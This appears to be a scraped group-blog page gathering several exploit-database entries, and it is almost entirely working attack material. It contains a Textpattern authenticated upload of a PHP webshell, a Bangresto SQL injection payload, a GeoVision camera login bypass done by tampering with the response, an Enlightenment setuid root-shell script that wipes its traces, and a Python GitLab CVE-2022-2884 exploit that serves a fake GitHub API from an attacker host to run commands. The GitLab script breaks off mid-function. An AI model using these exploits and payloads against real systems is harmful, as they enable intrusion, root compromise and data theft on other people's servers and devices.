# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://textpattern.com/
# Version : 4.8.8
# Tested on: windows 11 xammp | Kali linux
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 10/09/2022
#
######## Description ########
#
# Step 1: Login admin account and go settings of site
# Step 2: Upload a file to web site and selecet the rce.php
# Step3 : Upload your webshell that's it...
#
######## Proof of Concept ########
========>>> START REQUEST <<<=========
############# POST REQUEST (FILE UPLOAD) ############################## (1)
POST /textpattern/index.php?event=file HTTP/1.1
Host: localhost
Content-Length: 1038
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
Connection: close
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="fileInputOrder"
1/1
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="app_mode"
async
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="event"
file
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="step"
file_insert
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="_txp_token"
16ea3b64ca6379aee9599586dae73a5d
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
Content-Type: application/octet-stream
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryMgUEFltFdqBVvdJu--
############ POST RESPONSE (FILE UPLOAD) ######### (1)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:28:57 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Textpattern-Runtime: 35.38 ms
X-Textpattern-Querytime: 9.55 ms
X-Textpattern-Queries: 16
X-Textpattern-Memory: 2893 kB
Content-Length: 270
Connection: close
Content-Type: text/javascript; charset=utf-8
___________________________________________________________________________________________________________________________________________________
############ REQUEST TO THE PAYLOAD ############################### (2)
GET /files/c.php?cmd=whoami HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login_public=4353608be0admin
Connection: close
############ RESPONSE THE PAYLOAD ############################### (2)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:33:06 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Content-Length: 29
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>alpernae\alperen
</pre>
========>>> END REQUEST <<<=========
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863110635
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
## Exploit Title: Bangresto 1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 12.16.2022
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
## Demo: https://axcora.my.id/bangrestoapp/start.php
## Software: https://github.com/mesinkasir/bangresto
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto
## Description:
The `itemID` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database
error message was returned.
The attacker can be stooling all information from the database of this
application.
## STATUS: CRITICAL Vulnerability
[+] Payload:
```MySQL
---
Parameter: itemID (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT
(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)
## Proof and Exploit:
[href](https://streamable.com/moapnd)
## Time spent
`00:30:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass
# Device name: GV-ADR2701
# Date: 26 December , 2020
# Exploit Author: Chan Nyein Wai
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Firmware Version: V1.00_2017_12_15
# Tested on: windows 10
# Exploitation
1. Capture The Login Request with burp, Do intercept request to response
Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)
Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length: 46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1
{"UserName":"admin","Password":"0X]&0D]]05"}
```
2. The following is the normal response when you login to the server.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 460,
"StatusString": "PasswdError",
"Data": "null"
}
}
```
By editing the response to the following, you can successfully log in to
the web application.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 0,
"StatusString": "Succeed",
"Data": "null"
}
}
```
## Exploit Title: Enlightenment v0.25.3 - Privilege escalation
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## CVE ID: CVE-2022-37706
## Description:
The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.
Enlightenment_sys in Enlightenment before 0.25.3 allows local users to
gain privileges because it is setuid root,
and the system library function mishandles pathnames that begin with a
/dev/.. substring
If the attacker has access locally to some machine on which the
machine is installed Enlightenment
he can use this vulnerability to do very dangerous stuff.
## STATUS: CRITICAL Vulnerability
## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```
[+] Exploit:
```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),
"/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evedence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Proof and Exploit:
[href](https://streamable.com/zflbgg)
## Time spent
`01:00:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-12-25
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install/
# Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1
# Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution)
# CVE: CVE-2022-2884
# Category: WebApps
# Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884
# Credits: yvvdwf (https://hackerone.com/reports/1672388)
# This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.
# A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3,
# 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution
# via the Import from GitHub API endpoint.
# https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/
# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.
import argparse
import logging
import validators
import random
import string
import requests
import time
import base64
import sys
from flask import Flask, current_app, request
from multiprocessing import Process
VERSION = "v1.0 (2022-12-25)"
DEFAULT_LOGGING_LEVEL = logging.INFO
app = Flask(__name__)
def parse_arguments():
parser = argparse.ArgumentParser(
description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}"
)
parser.add_argument("-u", "--url",
required=True,
help="URL of the victim GitLab")
parser.add_argument("-pt", "--private-token",
required=True,
help="private token of GitLab")
parser.add_argument("-tn", "--target-namespace",
required=False,
default="root",
help="target namespace of GitLab (default is 'root')")
parser.add_argument("-a", "--address",
required=True,
help="IP address of the attacker machine")
parser.add_argument("-p", "--port",
required=False,
type=int,
default=1337,
help="TCP port of the attacker machine (default is 1337)")
parser.add_argument("-s", "--https",
action="store_true",
required=False,
default=False,
help="set if the attacker machine is exposed via HTTPS")
parser.add_argument("-c", "--command",
required=True,
help="the command to execute")
parser.add_argument("-d", "--delay",
type=float,
required=False,
help="seconds of delay to wait for the exploit to complete")
parser.add_argument("-v", "--verbose",
action="store_true",
required=False,
default=False,
help="verbose mode")
return parser.parse_args()
def validate_input(args):
try:
validators.url(args.url)
except validators.ValidationFailure:
raise ValueError("Invalid target URL!")
if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"):
raise ValueError("Invalid GitLab private token!")
if len(args.target_namespace.strip()) < 1:
raise ValueError("Invalid GitLab target namespace!")
try:
validators.ipv4(args.address)
except validators.ValidationFailure:
raise ValueError("Invalid attacker IP address!")
if args.port < 1 or args.port > 65535:
raise ValueError("Invalid attacker TCP port!")
if len(args.command.strip()) < 1:
raise ValueError("Invalid command!")
if args.delay is not None and args.delay <= 0.0:
raise ValueError("Invalid delay!")
def generate_random_string(length):
letters = string.ascii_lowercase + string.ascii_uppercase + string.digits
return ''.join(random.choice(letters) for i in range(length))
def generate_random_lowercase_string(length):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
def generate_random_number(length):
letters = string.digits
result = "0"
while result.startswith("0"):
result = ''.join(random.choice(letters) for i in range(length))
return result
def base64encode(to_encode):
return base64.b64encode(to_encode.encode("ascii")).decode("ascii")
def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id):
logging.info("Sending request to target GitLab.")
protocol = "http"
if is_https:
protocol += "s"
headers = {
"Content-Type": "application/json",
"PRIVATE-TOKEN": private_token,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
}
fake_personal_access_token = "ghp_" + generate_random_string(36)
new_name = generate_random_lowercase_string(8)
logging.debug("Random generated parameters of the request:")
logging.debug(f" fake_repo_id = {fake_repo_id}")
logging.debug(f"fake_personal_access_token = {fake_personal_access_token}")
logging.debug(f" new_name = {new_name}")
payload = {
"personal_access_token": fake_personal_access_token,
"repo_id": fake_repo_id,
"target_namespace": target_namespace,
"new_name": new_name,
"github_hostname": f"{protocol}://{address}:{port}"
}
target_endpoint = f"{url}"
if not target_endpoint.endswith("/"):
target_endpoint = f"{target_endpoint}/"
target_endpoint = f"{target_endpoint}api/v4/import/github"
try:
r = requests.post(target_endpoint, headers=headers, json=payload)
logging.debug("Response:")
logging.debug(f"status_code = {r.status_code}")
logging.debug(f" text = {r.text}")
logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).")
if r.status_code != 201:
logging.fatal("Wrong response received from the target GitLab.")
logging.debug(f" text = {r.text}")
raise Exception("Wrong response received from the target GitLab.")
except:
logging.fatal("Error in contacting the target GitLab.")
raise Exception("Error in contacting the target GitLab.")
def is_server_alive(address, port, is_https):
protocol = "http"
if is_https:
protocol += "s"
try:
r = requests.get(f"{protocol}://{address}:{port}/")
if r.status_code == 200 and "The server is running." in r.text:
return True
else:
return False
except:
return False
def start_fake_github_server(address, port, is_https, command, fake_repo_id):
app.config["address"] = address
app.config["port"] = port
protocol = "http"
if is_https:
protocol += "s"
app.config["attacker_server"] = f"{protocol}://{address}:{port}"
app.config["command"] = command
app.config["fake_user"] = generate_random_lowercase_string(8)
app.config["fake_user_id"] = generate_random_number(8)
app.config["fake_repo"] = generate_random_lowercase_string(8)
app.config["fake_repo_id"] = fake_repo_id
app.config["fake_issue_id"] = generate_random_number(9)
app.run("0.0.0.0", port)
def encode_command(command):
encoded_command = ""
for c in command:
encoded_command += ("<< " + str(ord(c)) + ".chr ")
encoded_command += "<<"
logging.debug(f"encoded_command = {encoded_command}")
return encoded_command
def generate_rce_payload(command):
logging.debug("Crafting RCE payload:")
logging.debug(f" command = {command}")
encoded_command = encode_command(command) # Useful in order to prevent escaping hell...
rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\""
logging.debug(f" rce_payload = {rce_payload}")
return rce_payload
def generate_user_response(attacker_server, fake_user, fake_user_id):
response = {
"avatar_url": f"{attacker_server}/avatars/{fake_user_id}",
"events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}",
"followers_url": f"{attacker_server}/users/{fake_user}/followers",
"following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}",
"gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}",
"gravatar_id": "",
"html_url": f"{attacker_server}/{fake_user}",
"id": int(fake_user_id),
"login": f"{fake_user}",
"node_id": base64encode(f"04:User{fake_user_id}"),
"organizations_url": f"{attacker_server}/users/{fake_user}/orgs",
"received_events_url": f"{attacker_server}/users/{fake_user}/received_events",
"repos_url": f"{attacker_server}/users/{fake_user}/repos",
"site_admin": False,
"starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}",
"subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions",
"type": "User",
"url": f"{attacker_server}/users/{fake_user}"
}
return response
def generate_user_full_response(attacker_server, fake_user, fake_user_id):
partial = generate_user_response(attacker_server, fake_user, fake_user_id)
others = {
"bio": None,
"blog": "",
"company": None,
"created_at": "2020-08-21T14:35:46Z",
"email": None,
"followers": 2,
"following": 0,
"hireable": None,
"location": None,
"name": None,
"public_gists": 0,
"public_repos": 0,
"twitter_username": None,
"updated_at": "2022-08-08T12:11:40Z",
}
response = {**partial, **others}
return response
def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id):
response = {
"allow_auto_merge": False,
"allow_forking": True,
"allow_merge_commit": True,
"allow_rebase_merge": True,
"allow_squash_merge": True,
"allow_update_branch": False,
"archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}",
"archived": False,
"assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}",
"blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}",
"branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}",
"clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git",
"collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}",
"comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}",
"commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}",
"compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}",
"contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}",
"contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors",
"created_at": "2021-04-09T13:55:55Z",
"default_branch": "main",
"delete_branch_on_merge": False,
"deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments",
"description": None,
"disabled": False,
"downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads",
"events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events",
"fork": False,
"forks": 1,
"forks_count": 1,
"forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks",
"full_name": f"{fake_user}/{fake_repo}",
"git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}",
"git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}",
"git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}",
"git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git",
"has_downloads": True,
"has_issues": True,
"has_pages": False,
"has_projects": True,
"has_wiki": True,
"homepage": None,
"hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks",
"html_url": f"{attacker_server}/{fake_user}/{fake_repo}",
"id": int(repo_id),
"is_template": False,
"issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}",
"issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}",
"issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}",
"keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}",
"labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}",
"language": "Python",
"languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages",
"license": None,
"merge_commit_message": "Message",
"merge_commit_title": "Title",
"merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges",
"milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}",
"mirror_url": None,
"name": f"{fake_repo}",
"network_count": 1,
"node_id": base64encode(f"010:Repository{repo_id}"),
"notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}",
"open_issues": 4,
"open_issues_count": 4,
"owner": generate_user_response(attacker_server, fake_user, fake_user_id),
"permissions": {
"admin": True,
"maintain": True,
"pull": True,
"push": True,
"triage": True
},
"private": True,
"pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}",
"pushed_at": "2022-08-14T15:36:21Z",
"releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}",
"size": 3802,
"squash_merge_commit_message": "Message",
"squash_merge_commit_title": "Title",
"ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git",
"stargazers_count": 0,
"stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers",
"statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}",
"subscribers_count": 1,
"subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers",
"subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription",
"svn_url": f"{attacker_server}/{fake_user}/{fake_repo}",
"tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags",
"teams_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/teams",
"temp_clone_token": generate_random_string(32),
"topics": [],
"trees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/trees{{/sha}}",
"updated_at": "2022-06-10T15:12:53Z",
"url": f"{attacker_server}/repos/{fake_user}/{fake_repo}",
"use_squash_pr_title_as_default": False,
"visibility": "private",
"watchers": 0,
"watchers_count": 0,
"web_commit_signoff_required": False
}
return response
def generate_issue_response(attacker_server, fake_user, fake_user_id, fake_repo, fake_issue_id, command):
rce_payload = generate_rce_payload(command)
response = [
{
"active_lock_reason": None,
"assignee": None,
"assignees": [],
"author_association": "OWNER",
"body": "hn-issue description",
"closed_at": None,
"comments": 1,
"comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/comments",
"created_at": "2021-07-23T13:16:55Z",
"events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/events",
"html_url": f"{attacker_server}/{fake_user}/{fake_repo}/issues/3",
"id": int(fake_issue_id),
"labels": [],
"labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/labels{{/name}}",
"locked": False,
"milestone": None,
"node_id": base64encode(f"05:Issue{fake_issue_id}"),
"_number": 1,
"number": {"to_s": {"bytesize": 2, "to_s": f"1234{rce_payload}" }},
"performed_via_github_app": None,
"reactions": {
"+1": 0,
"-1": 0,
"confused": 0,
"eyes": 0,
"heart": 0,
"hooray": 0,
"laugh": 0,
"rocket": 0,
"total_count": 0,
"url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/reactions"
},
"repository_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/test",
"state": "open",
"state_reason": None,
"timeline_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3/timeline",
"title": f"{fake_repo}",
"updated_at": "2022-08-14T15:37:08Z",
"url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/3",
"user": generate_user_response(attacker_server, fake_user, fake_user_id)
}
]
return response
@app.before_request
def received_request():
logging.debug(f"Received request:")
logging.debug(f" url = {request.url}")
logging.debug(f"headers = {request.headers}")
@app.after_request
def add_headers(response):
response.headers["content-type"] = "application/json; charset=utf-8"
response.headers["x-ratelimit-limit"] = "5000"
response.headers["x-ratelimit-remaining"] = "4991"
response.headers["x-ratelimit-reset"] = "1660136749"
response.headers["x-ratelimit-used"] = "9"
response.headers["x-ratelimit-resource"] = "core"
return response
@app.route("/")
def index():
return "The server is running."
@app.route("/api/v3/rate_limit")
def api_rate_limit():
response = {
"resources": {
"core": {
"limit": 5000,
"used": 9,
"remaining": 4991,
"reset": 1660136749
},
"search": {
"limit": 30,
"used": 0,
"remaining": 30,
"reset": 1660133589
},
"graphql": {
"limit": 5000,
"used": 0,
"remaining": 5000,
"reset": 1660137129
},
"integration_manifest": {
"limit": 5000,
"used": 0,
"remaining": 5000,
"reset": 1660137129
},
"source_import": {
"limit": 100,
"used": 0,
"remaining": 100,
"reset": 1660133589
},
"code_scanning_upload": {
"limit": 1000,
"used": 0,
"remaining": 1000,
"reset": 1660137129
},
"actions_runner_registration": {
"limit": 10000,
"used": 0,
"remaining": 10000,
"reset": 1660137129
},
"scim": {
"limit": 15000,
"used": 0,
"remaining": 15000,
"reset": 1660137129
},
"dependency_snapshots": {
"limit": 100,
"used": 0,
"remaining": 100,
"reset": 1660133589
}
},
"rate": {
"limit": 5000,
"used": 9,
"remaining": 4991,
"reset": 1660136749
}
}
return response
@app.route("/api/v3/repositories/<repo_id>")
@app.route("/repositories/<repo_id>")
def api_repositories_repo_id(repo_id: int):
address = current_app.config["address"]
port = current_app.config["port"]
attacker_server = current_app.config["attacker_server"]
fake_user = current_app.config["fake_user"]
fake_user_id = current_app.config["fake_user_id"]
fake_repo = current_app.config["fake_repo"]
response = generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id)
return response
@app.route("/api/v3/repos/<user>/<repo>")
def api_repositories_repo_user_repo(user: string, repo: string):
address = current_app.config["address"]
port = current_app.config["port"]
attacker_server = current_app.config["attacker_server"]
fake_user_id = current_app.config["fake_user_id"]
fake_repo_id = current_app.config["fake_repo_id"]
response = generate_repo_response(address, port, attacker_server, user, fake_user_id, repo, fake_repo_id)
return response
@app.route("/api/v3/repos/<user>/<repo>/issues")
def api_repositories_repo_user_repo_issues(user: string, repo: string):
attacker_server = current_app.config["attacker_server"]
fake_user_id = current_app.config["fake_user_id"]
fake_issue_id = current_app.config["fake_issue_id"]
command = current_app.config["command"]
response = generate_issue_response(attacker_server, user, fake_user_id, repo, fake_issue_id, command)
return response
@app.route("/api/v3/users/<user>")
def api_users_user(user: string):
attacker_server = current_app.config["attacker_server"]
fake_user_id = current_app.config["fake_user_id"]
response = generate_user_full_response(attacker_server, user, fake_user_id)
return response
@app.route("/<user>/<repo>.git/HEAD")
@app.route("/<user>/<repo>.git/info/refs")
@app.route("/<user>/<repo>.wiki.git/HEAD")
@app.route("/<user>/<repo>.wiki.git/info/refs")
def empty_response(user: string, repo: string):
logging.debug("Empty string response.")
return ""
# All the others/non-existing routes.
@app.route('/<path:path>')
def catch_all(path):
logging.debug("Empty JSON array response.")
return []
def main():
args = parse_arguments()
logging_level = DEFAULT_LOGGING_LEVEL
if args.verbose:
logging_level = logging.DEBUG
logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s")
validate_input(args)
url = args.url.strip()
private_token = args.private_token.strip()
target_namespace = args.target_namespace.strip()
address = args.address.strip()
port = args.port
is_https = args.https
command = args.command.strip()
delay = args.delay
logging.info(f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}")
logging.debug("Parameters:")
logging.debug(f" url = {url}")
logging.debug(f" private_token = {private_token}")
logging.debug(f"target_namespace = {target_namespace}")
logging.debug(f" address = {address}")
logging.debug(f" port = {port}")
logging.debug(f" is_https = {is_https}")
logging.debug(f" command = {command}")
logging.debug(f" delay = {delay}")
fake_repo_id = generate_random_number(9)
fake_github_server = Process(target=start_fake_github_server, args=(address, port, is_https, command, fake_repo_id))
fake_github_server.start()
logging.info("Waiting for the fake GitHub server to start.")
while not is_server_alive(address, port, is_https):
time.sleep(1)
logging.debug("Waiting for the fake GitHub server to start.")
